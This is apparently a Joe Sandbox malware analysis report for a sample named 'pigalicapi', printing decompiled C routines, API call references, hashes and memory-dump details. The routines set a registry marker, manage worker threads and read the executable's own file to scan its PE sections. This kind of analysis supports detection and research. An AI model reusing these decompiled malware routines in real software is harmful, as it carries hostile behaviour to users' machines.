                                                                                                                                                                                                                                                                            • Opcode ID: 511b09c3c371674e910c67b1de596b5c39c680ca9ce3683f10c555545da0e883
                                                                                                                                                                                                                                                                            • Instruction ID: fefe6a5121870bae5e1fa4d6b7e759c68f5f3c4ee8a015b07e91a6cc68f07aa0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 511b09c3c371674e910c67b1de596b5c39c680ca9ce3683f10c555545da0e883
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37314F79A0020AFBDB29DFA4DC89FAE3776AB44704F008518FA159B381D7B59650CFD0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E01175F30() {
                                                                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                                                                            				signed int _v9;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                                                            				char _v284;
                                                                                                                                                                                                                                                                            				int _v288;
                                                                                                                                                                                                                                                                            				int _v292;
                                                                                                                                                                                                                                                                            				char _v324;
                                                                                                                                                                                                                                                                            				int _v328;
                                                                                                                                                                                                                                                                            				char* _t27;
                                                                                                                                                                                                                                                                            				CHAR* _t30;
                                                                                                                                                                                                                                                                            				long _t37;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v9 = 0;
                                                                                                                                                                                                                                                                            				_t27 =  *0x11818a0; // 0x1183b88
                                                                                                                                                                                                                                                                            				_v8 = _t27;
                                                                                                                                                                                                                                                                            				E01177D20(_t27,  &_v284, 0, 0x104);
                                                                                                                                                                                                                                                                            				lstrcpyA( &_v284, "pigalicapi");
                                                                                                                                                                                                                                                                            				_t30 =  *0x1181898; // 0x1183fe2
                                                                                                                                                                                                                                                                            				lstrcatA( &_v284, _t30);
                                                                                                                                                                                                                                                                            				_v16 = 0x80000001;
                                                                                                                                                                                                                                                                            				if(( *0x118435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            					_v16 = 0x80000002;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                                                            				if(RegOpenKeyExA(_v16, _v8, 0, 0xf003f,  &_v20) == 0) {
                                                                                                                                                                                                                                                                            					_v292 = 0x20;
                                                                                                                                                                                                                                                                            					_v288 = 0x20;
                                                                                                                                                                                                                                                                            					_t37 = RegQueryValueExA(_v20,  &_v284, 0, 0,  &_v324,  &_v288); // executed
                                                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                                                            						_v9 = 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t47 = _v9 & 0x000000ff;
                                                                                                                                                                                                                                                                            					if((_v9 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            						_v328 = 0x10;
                                                                                                                                                                                                                                                                            						E01179BD0(_t47,  &_v324, 0x10);
                                                                                                                                                                                                                                                                            						RegSetValueExA(_v20,  &_v284, 0, 3,  &_v324, 0x10);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					RegCloseKey(_v20);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v9;
                                                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                                                            0x01175f39
                                                                                                                                                                                                                                                                            0x01175f3d
                                                                                                                                                                                                                                                                            0x01175f42
                                                                                                                                                                                                                                                                            0x01175f53
                                                                                                                                                                                                                                                                            0x01175f67
                                                                                                                                                                                                                                                                            0x01175f6d
                                                                                                                                                                                                                                                                            0x01175f7a
                                                                                                                                                                                                                                                                            0x01175f80
                                                                                                                                                                                                                                                                            0x01175f90
                                                                                                                                                                                                                                                                            0x01175f92
                                                                                                                                                                                                                                                                            0x01175f92
                                                                                                                                                                                                                                                                            0x01175f99
                                                                                                                                                                                                                                                                            0x01175fbb
                                                                                                                                                                                                                                                                            0x01175fc1
                                                                                                                                                                                                                                                                            0x01175fcb
                                                                                                                                                                                                                                                                            0x01175ff2
                                                                                                                                                                                                                                                                            0x01175ffa
                                                                                                                                                                                                                                                                            0x01175ffc
                                                                                                                                                                                                                                                                            0x01175ffc
                                                                                                                                                                                                                                                                            0x01176000
                                                                                                                                                                                                                                                                            0x01176006
                                                                                                                                                                                                                                                                            0x01176008
                                                                                                                                                                                                                                                                            0x0117601b
                                                                                                                                                                                                                                                                            0x0117603b
                                                                                                                                                                                                                                                                            0x0117603b
                                                                                                                                                                                                                                                                            0x01176045
                                                                                                                                                                                                                                                                            0x01176045
                                                                                                                                                                                                                                                                            0x01176051

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,pigalicapi), ref: 01175F67
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,01183FE2), ref: 01175F7A
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,01173C58,00000000,000F003F,00000000), ref: 01175FB3
                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 01175FF2
                                                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 0117603B
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 01176045
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Value$CloseOpenQuerylstrcatlstrcpy
                                                                                                                                                                                                                                                                            • String ID: $ $pigalicapi
                                                                                                                                                                                                                                                                            • API String ID: 764223185-550099112
                                                                                                                                                                                                                                                                            • Opcode ID: a0235c58c1d279a22c1c891a529b3ed603f37828b6214a8266e1b2ce6af86870
                                                                                                                                                                                                                                                                            • Instruction ID: 1aee7431ffa988cbd5e031ee86737ac050d4e1037b971ffd6af351d4eb9133ad
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0235c58c1d279a22c1c891a529b3ed603f37828b6214a8266e1b2ce6af86870
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C33184B590021DABEB29CB90DC46FFEB778BB09704F04849CFA14A6281D7B55684CFA1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E01174096() {
                                                                                                                                                                                                                                                                            				void _t92;
                                                                                                                                                                                                                                                                            				void* _t114;
                                                                                                                                                                                                                                                                            				void* _t161;
                                                                                                                                                                                                                                                                            				void* _t163;
                                                                                                                                                                                                                                                                            				void* _t166;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				L0:
                                                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                                                            					L0:
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t161 - 0x38)) =  *((intOrPtr*)(_t161 - 0x38)) + 1;
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t161 - 0x38)) >=  *((intOrPtr*)(_t161 + 0x14))) {
                                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                                                            					EnterCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                            					if( *(_t161 - 0x30) != 0) {
                                                                                                                                                                                                                                                                            						VirtualFree( *(_t161 - 0x30), 0, 0x8000);
                                                                                                                                                                                                                                                                            						 *(_t161 - 0x30) = 0;
                                                                                                                                                                                                                                                                            						 *(_t161 - 0x2c) = 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t171 =  *(_t161 - 0x34);
                                                                                                                                                                                                                                                                            					if( *(_t161 - 0x34) != 0) {
                                                                                                                                                                                                                                                                            						TerminateThread( *(_t161 - 0x34), 0);
                                                                                                                                                                                                                                                                            						 *(_t161 - 0x34) = 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					ResetEvent( *(_t161 - 0x10));
                                                                                                                                                                                                                                                                            					LeaveCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                            					_t92 = CreateThread(0, 0, E01174AC0, _t161 - 0x34, 0, 0); // executed
                                                                                                                                                                                                                                                                            					 *(_t161 - 0x34) = _t92;
                                                                                                                                                                                                                                                                            					 *(_t161 - 0x64) = E011797A0( ~(0 | _t171 > 0x00000000) |  *(_t161 + 0x18) * 0x00000004);
                                                                                                                                                                                                                                                                            					 *(_t161 - 0x3c) =  *(_t161 - 0x64);
                                                                                                                                                                                                                                                                            					E01177D20( *(_t161 - 0x64),  *(_t161 - 0x3c), 0,  *(_t161 + 0x18) << 2);
                                                                                                                                                                                                                                                                            					_t166 = _t163 + 0x10;
                                                                                                                                                                                                                                                                            					 *(_t161 - 0x60) = 0;
                                                                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                                                                            					while( *(_t161 - 0x60) <  *(_t161 + 0x18)) {
                                                                                                                                                                                                                                                                            						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = 0;
                                                                                                                                                                                                                                                                            						E01177D20( *(_t161 - 0x3c), _t161 - 0x58, 0, 0x1c);
                                                                                                                                                                                                                                                                            						_t166 = _t166 + 0xc;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t161 - 0x40)) = _t161 - 0x34;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t161 - 0x44)) =  *((intOrPtr*)(_t161 + 0x10));
                                                                                                                                                                                                                                                                            						 *(_t161 - 0x58) =  *(_t161 + 8);
                                                                                                                                                                                                                                                                            						 *(_t161 - 0x50) =  *(_t161 - 0x60) *  *(_t161 - 8);
                                                                                                                                                                                                                                                                            						if( *(_t161 - 0x60) >=  *(_t161 + 0x18) - 1) {
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t161 - 0x4c)) =  *((intOrPtr*)(_t161 + 0xc)) - 1;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t161 - 0x4c)) =  *(_t161 - 0x50) +  *(_t161 - 8) - 1;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						 *(_t161 - 0x48) = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                            						_t114 = CreateThread(0, 0, E01174BA0, _t161 - 0x58, 0, 0); // executed
                                                                                                                                                                                                                                                                            						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = _t114;
                                                                                                                                                                                                                                                                            						WaitForSingleObject( *(_t161 - 0x48), 0xffffffff);
                                                                                                                                                                                                                                                                            						FindCloseChangeNotification( *(_t161 - 0x48)); // executed
                                                                                                                                                                                                                                                                            						 *(_t161 - 0x60) =  *(_t161 - 0x60) + 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					WaitForMultipleObjects( *(_t161 + 0x18),  *(_t161 - 0x3c), 1, 0xffffffff);
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x10), 0x2710);
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t161 - 0x5c)) == 0) {
                                                                                                                                                                                                                                                                            						 *(_t161 - 1) = 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x34), 0x3e8);
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t161 - 0x5c)) != 0) {
                                                                                                                                                                                                                                                                            						TerminateThread( *(_t161 - 0x34), 0);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                                                            					EnterCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                            					if( *(_t161 - 0x30) != 0) {
                                                                                                                                                                                                                                                                            						VirtualFree( *(_t161 - 0x30), 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            						 *(_t161 - 0x30) = 0;
                                                                                                                                                                                                                                                                            						 *(_t161 - 0x2c) = 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                                                            					LeaveCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                            					 *(_t161 - 0x68) =  *(_t161 - 0x3c);
                                                                                                                                                                                                                                                                            					E011797C0( *(_t161 - 0x68));
                                                                                                                                                                                                                                                                            					if(( *(_t161 - 1) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            						L21:
                                                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				L22:
                                                                                                                                                                                                                                                                            				DeleteCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                            				return  *(_t161 - 1);
                                                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                                                            0x01174096
                                                                                                                                                                                                                                                                            0x01174096
                                                                                                                                                                                                                                                                            0x01174096
                                                                                                                                                                                                                                                                            0x0117409c
                                                                                                                                                                                                                                                                            0x011740a5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011740ab
                                                                                                                                                                                                                                                                            0x011740af
                                                                                                                                                                                                                                                                            0x011740b9
                                                                                                                                                                                                                                                                            0x011740c6
                                                                                                                                                                                                                                                                            0x011740cc
                                                                                                                                                                                                                                                                            0x011740d3
                                                                                                                                                                                                                                                                            0x011740d3
                                                                                                                                                                                                                                                                            0x011740da
                                                                                                                                                                                                                                                                            0x011740de
                                                                                                                                                                                                                                                                            0x011740e6
                                                                                                                                                                                                                                                                            0x011740ec
                                                                                                                                                                                                                                                                            0x011740ec
                                                                                                                                                                                                                                                                            0x011740f7
                                                                                                                                                                                                                                                                            0x01174101
                                                                                                                                                                                                                                                                            0x01174118
                                                                                                                                                                                                                                                                            0x0117411e
                                                                                                                                                                                                                                                                            0x0117413d
                                                                                                                                                                                                                                                                            0x01174143
                                                                                                                                                                                                                                                                            0x01174153
                                                                                                                                                                                                                                                                            0x01174158
                                                                                                                                                                                                                                                                            0x0117415b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117416d
                                                                                                                                                                                                                                                                            0x0117417f
                                                                                                                                                                                                                                                                            0x0117418e
                                                                                                                                                                                                                                                                            0x01174193
                                                                                                                                                                                                                                                                            0x01174199
                                                                                                                                                                                                                                                                            0x0117419f
                                                                                                                                                                                                                                                                            0x011741a5
                                                                                                                                                                                                                                                                            0x011741af
                                                                                                                                                                                                                                                                            0x011741bb
                                                                                                                                                                                                                                                                            0x011741d2
                                                                                                                                                                                                                                                                            0x011741bd
                                                                                                                                                                                                                                                                            0x011741c7
                                                                                                                                                                                                                                                                            0x011741c7
                                                                                                                                                                                                                                                                            0x011741e3
                                                                                                                                                                                                                                                                            0x011741f7
                                                                                                                                                                                                                                                                            0x01174203
                                                                                                                                                                                                                                                                            0x0117420c
                                                                                                                                                                                                                                                                            0x01174216
                                                                                                                                                                                                                                                                            0x0117416a
                                                                                                                                                                                                                                                                            0x0117416a
                                                                                                                                                                                                                                                                            0x0117422d
                                                                                                                                                                                                                                                                            0x01174242
                                                                                                                                                                                                                                                                            0x01174249
                                                                                                                                                                                                                                                                            0x0117424b
                                                                                                                                                                                                                                                                            0x0117424b
                                                                                                                                                                                                                                                                            0x0117425e
                                                                                                                                                                                                                                                                            0x01174265
                                                                                                                                                                                                                                                                            0x0117426d
                                                                                                                                                                                                                                                                            0x0117426d
                                                                                                                                                                                                                                                                            0x01174273
                                                                                                                                                                                                                                                                            0x01174277
                                                                                                                                                                                                                                                                            0x01174281
                                                                                                                                                                                                                                                                            0x0117428e
                                                                                                                                                                                                                                                                            0x01174294
                                                                                                                                                                                                                                                                            0x0117429b
                                                                                                                                                                                                                                                                            0x0117429b
                                                                                                                                                                                                                                                                            0x011742a2
                                                                                                                                                                                                                                                                            0x011742a6
                                                                                                                                                                                                                                                                            0x011742af
                                                                                                                                                                                                                                                                            0x011742b6
                                                                                                                                                                                                                                                                            0x011742c4
                                                                                                                                                                                                                                                                            0x011742c8
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011742c8
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011742c4
                                                                                                                                                                                                                                                                            0x011742cd
                                                                                                                                                                                                                                                                            0x011742d1
                                                                                                                                                                                                                                                                            0x011742dd

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?), ref: 011740AF
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 011740C6
                                                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,00000000), ref: 011740E6
                                                                                                                                                                                                                                                                            • ResetEvent.KERNEL32(00000000), ref: 011740F7
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 01174101
                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 01174118
                                                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 011741DD
                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 011741F7
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0117420C
                                                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNEL32(?), ref: 01174216
                                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,?), ref: 011742D1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateCriticalSectionThread$Event$ChangeCloseDeleteEnterFindFreeLeaveNotificationObjectResetSingleTerminateVirtualWait
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 371823443-0
                                                                                                                                                                                                                                                                            • Opcode ID: 0e490d7c6aa90fbf56c38fbd9042d2854ab8b2c5a149fc9d61a414401cb062f8
                                                                                                                                                                                                                                                                            • Instruction ID: bcb8c0ee7cd73ee8bcb332fa550feccb7993b04efa921a9e2cefcd62577c01eb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e490d7c6aa90fbf56c38fbd9042d2854ab8b2c5a149fc9d61a414401cb062f8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9251D5B5A40309EFDB18DFA4E899BEDBBB1FB48704F104129F515AB384D770A980CB94
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E01174510(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                                                                            				char _v780;
                                                                                                                                                                                                                                                                            				void* _v784;
                                                                                                                                                                                                                                                                            				char _v1308;
                                                                                                                                                                                                                                                                            				long _v1312;
                                                                                                                                                                                                                                                                            				void* _v1316;
                                                                                                                                                                                                                                                                            				long _v1320;
                                                                                                                                                                                                                                                                            				intOrPtr _v1324;
                                                                                                                                                                                                                                                                            				intOrPtr _v1328;
                                                                                                                                                                                                                                                                            				signed int _v1332;
                                                                                                                                                                                                                                                                            				intOrPtr _v1336;
                                                                                                                                                                                                                                                                            				intOrPtr _v1340;
                                                                                                                                                                                                                                                                            				intOrPtr _v1344;
                                                                                                                                                                                                                                                                            				void* _t90;
                                                                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                                                                            				int _t97;
                                                                                                                                                                                                                                                                            				signed char _t101;
                                                                                                                                                                                                                                                                            				signed char _t114;
                                                                                                                                                                                                                                                                            				void* _t153;
                                                                                                                                                                                                                                                                            				void* _t155;
                                                                                                                                                                                                                                                                            				void* _t156;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                            					L24:
                                                                                                                                                                                                                                                                            					return _v5;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					E01177D20(E01177D20( &_v780,  &_v780, 0, 0x300),  &_v1308, 0, 0x208);
                                                                                                                                                                                                                                                                            					_t155 = _t153 + 0x18;
                                                                                                                                                                                                                                                                            					GetModuleFileNameA(0,  &_v1308, 0x208);
                                                                                                                                                                                                                                                                            					_t90 = CreateFileA( &_v1308, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                            					_v784 = _t90;
                                                                                                                                                                                                                                                                            					if(_v784 == 0xffffffff) {
                                                                                                                                                                                                                                                                            						goto L24;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v1312 = GetFileSize(_v784, 0);
                                                                                                                                                                                                                                                                            					if(_v1312 == 0) {
                                                                                                                                                                                                                                                                            						L22:
                                                                                                                                                                                                                                                                            						if(_v784 != 0) {
                                                                                                                                                                                                                                                                            							CloseHandle(_v784);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L24;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t94 = VirtualAlloc(0, _v1312, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            					_v1316 = _t94;
                                                                                                                                                                                                                                                                            					if(_v1316 == 0) {
                                                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v1320 = 0;
                                                                                                                                                                                                                                                                            					_t97 = ReadFile(_v784, _v1316, _v1312,  &_v1320, 0); // executed
                                                                                                                                                                                                                                                                            					if(_t97 == 0 || _v1320 != _v1312) {
                                                                                                                                                                                                                                                                            						L20:
                                                                                                                                                                                                                                                                            						if(_v1316 != 0) {
                                                                                                                                                                                                                                                                            							VirtualFree(_v1316, 0, 0x8000);
                                                                                                                                                                                                                                                                            							_v1316 = 0;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						FindCloseChangeNotification(_v784); // executed
                                                                                                                                                                                                                                                                            						_v784 = 0;
                                                                                                                                                                                                                                                                            						_t101 = E011747F0(_v1316, _v1312, _a8); // executed
                                                                                                                                                                                                                                                                            						_t156 = _t155 + 0xc;
                                                                                                                                                                                                                                                                            						if((_t101 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            							if(_v1316 != 0) {
                                                                                                                                                                                                                                                                            								VirtualFree(_v1316, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            								_v1316 = 0;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v1328 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                            							_v1324 = _v1328 + ( *(_v1328 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                            							_v1332 = 0;
                                                                                                                                                                                                                                                                            							while(_v1332 < ( *(_v1328 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                            								_v1336 =  *((intOrPtr*)(_v1324 + 0xc + _v1332 * 0x28)) + _a4;
                                                                                                                                                                                                                                                                            								if( *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28)) <=  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28))) {
                                                                                                                                                                                                                                                                            									_v1344 =  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28));
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_v1344 =  *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28));
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v1340 = _v1344;
                                                                                                                                                                                                                                                                            								_t114 = E011747F0(_v1336, _v1340, _a8); // executed
                                                                                                                                                                                                                                                                            								_t156 = _t156 + 0xc;
                                                                                                                                                                                                                                                                            								if((_t114 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            									_v1332 = _v1332 + 1;
                                                                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_v5 = 1;
                                                                                                                                                                                                                                                                            									goto L20;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							goto L20;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v5 = 1;
                                                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                                                                            0x0117451a
                                                                                                                                                                                                                                                                            0x01174522
                                                                                                                                                                                                                                                                            0x011747e6
                                                                                                                                                                                                                                                                            0x011747ed
                                                                                                                                                                                                                                                                            0x01174532
                                                                                                                                                                                                                                                                            0x01174556
                                                                                                                                                                                                                                                                            0x0117455b
                                                                                                                                                                                                                                                                            0x0117456c
                                                                                                                                                                                                                                                                            0x0117458b
                                                                                                                                                                                                                                                                            0x01174591
                                                                                                                                                                                                                                                                            0x0117459e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011745b3
                                                                                                                                                                                                                                                                            0x011745c0
                                                                                                                                                                                                                                                                            0x011747d0
                                                                                                                                                                                                                                                                            0x011747d7
                                                                                                                                                                                                                                                                            0x011747e0
                                                                                                                                                                                                                                                                            0x011747e0
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011747d7
                                                                                                                                                                                                                                                                            0x011745d6
                                                                                                                                                                                                                                                                            0x011745dc
                                                                                                                                                                                                                                                                            0x011745e9
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011745ef
                                                                                                                                                                                                                                                                            0x01174617
                                                                                                                                                                                                                                                                            0x0117461f
                                                                                                                                                                                                                                                                            0x011747a9
                                                                                                                                                                                                                                                                            0x011747b0
                                                                                                                                                                                                                                                                            0x011747c0
                                                                                                                                                                                                                                                                            0x011747c6
                                                                                                                                                                                                                                                                            0x011747c6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01174637
                                                                                                                                                                                                                                                                            0x0117463e
                                                                                                                                                                                                                                                                            0x01174644
                                                                                                                                                                                                                                                                            0x01174660
                                                                                                                                                                                                                                                                            0x01174665
                                                                                                                                                                                                                                                                            0x0117466d
                                                                                                                                                                                                                                                                            0x0117467f
                                                                                                                                                                                                                                                                            0x0117468f
                                                                                                                                                                                                                                                                            0x01174695
                                                                                                                                                                                                                                                                            0x01174695
                                                                                                                                                                                                                                                                            0x011746a8
                                                                                                                                                                                                                                                                            0x011746c2
                                                                                                                                                                                                                                                                            0x011746c8
                                                                                                                                                                                                                                                                            0x011746e3
                                                                                                                                                                                                                                                                            0x0117470f
                                                                                                                                                                                                                                                                            0x0117473b
                                                                                                                                                                                                                                                                            0x0117476b
                                                                                                                                                                                                                                                                            0x0117473d
                                                                                                                                                                                                                                                                            0x01174750
                                                                                                                                                                                                                                                                            0x01174750
                                                                                                                                                                                                                                                                            0x01174777
                                                                                                                                                                                                                                                                            0x0117478f
                                                                                                                                                                                                                                                                            0x01174794
                                                                                                                                                                                                                                                                            0x0117479c
                                                                                                                                                                                                                                                                            0x011746dd
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117479e
                                                                                                                                                                                                                                                                            0x0117479e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117479e
                                                                                                                                                                                                                                                                            0x0117479c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011746e3
                                                                                                                                                                                                                                                                            0x0117466f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117466f
                                                                                                                                                                                                                                                                            0x0117461f

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 0117456C
                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0117458B
                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 011745AD
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 011745D6
